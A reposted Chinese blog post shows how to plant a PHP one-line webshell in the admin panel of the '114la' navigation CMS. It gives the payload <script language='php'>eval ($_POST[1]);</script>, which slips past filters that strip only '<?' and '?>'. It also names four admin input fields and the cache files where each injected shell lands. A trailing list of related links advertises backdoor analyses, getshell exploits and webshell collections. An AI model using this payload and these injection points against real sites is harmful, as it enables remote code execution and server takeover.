php后台插一句话后门的思路分享

所属分类: 网络安全 / 脚本攻防 阅读数: 931
收藏 0 赞 0 分享
首先介绍下php的各种标签:
1):
<?php ?>
demo:
<?php echo "test";?>
这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!
2):
<? echo "test"; ?>
这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它,
大多程序员都是很熟悉的!我们把这种标签称为短语标签!
3):
<script language="php"> </script>
demo:
<script language="php">echo "test";</script>
这个标签是今天的重点,大多都不熟悉的!而且程序员在网站后台过滤插一句话
的时候往往都是以
“<?,?>”
这两个关键字进行替换或过滤的!所以这种标签在后台插马
的时候用处还是很大的!PS:就是应为使用量不大,就不重视!这样能行吗?
实战:114啦导航准备我们的一句话代码:利用script的标签代码:
<script language="php">eval ($_POST[1]);</script>
首先后台我跟晴天那家伙已经看完了。他自己的方法也没拿下shell模版目录权限是只读!你们懂的!
这里的方法就是利用缓存拿shell.这个方法是以前公布出来的。作者具体就不知道是谁了(转载乱了)
–官方以及把这里修补了,但是修补方法很马虎!就是我之前说的过滤关键字只有
<? ?>
所以这里我们可以利用 我们准备好的script格式的php一句话代码插入!
名站首行:
HTML内输入一句话,提交后一句话木马位于admin/data/cache/cache_mztop.php
名站轮播:
站点网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_famous_loop.php
名站切换:
ifreme网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_famous_tab.php
首页实用工具:
工具网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_index_tool.php
本文来源于:半坑土农民'S Blog
更多精彩内容其他人还在看

一些常见的PHP后门原理分析

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果
收藏 0 赞 0 分享

Mysql语法绕过360scan insert防注入方法

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =方法
收藏 0 赞 0 分享

科讯KESION CMS最新版任意文件上传WEBSHELL漏洞

会员上传文件漏洞,可以上传任意后缀,实现任意文件上传WEBSHELL
收藏 0 赞 0 分享

phpcms2008 代码执行 批量getshell EXP(使用菜刀)

这篇文章主要介绍了phpcms2008 代码执行 批量getshell EXP的相关资料,需要的朋友可以参考下
收藏 0 赞 0 分享

PHP多字节编码漏洞小结

这篇文章主要介绍了PHP多字节编码漏洞小结,需要的朋友可以参考下
收藏 0 赞 0 分享

防范 dedecms 广告内容插入后门

这篇文章主要介绍了防范 dedecms 广告内容插入后门,需要的朋友可以参考下
收藏 0 赞 0 分享

记一次发现利用preg_replace隐藏后门和后续探究

php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码
收藏 0 赞 0 分享

Linux系统采用netstat命令查看DDOS攻击的方法

这篇文章主要为大家介绍了Linux系统采用netstat命令查看DDOS攻击的方法,对于网络安全而言非常重要!需要的朋友可以参考下
收藏 0 赞 0 分享

Linux实用一句话&脚本介绍

Linux实用一句话&脚本介绍,需要的朋友可以参考下
收藏 0 赞 0 分享

史上最全的各个脚本的一句话木马

史上最全的各个脚本的一句话木马,防扫,防杀,防火,防盗,大家注意查找木马
收藏 0 赞 0 分享
查看更多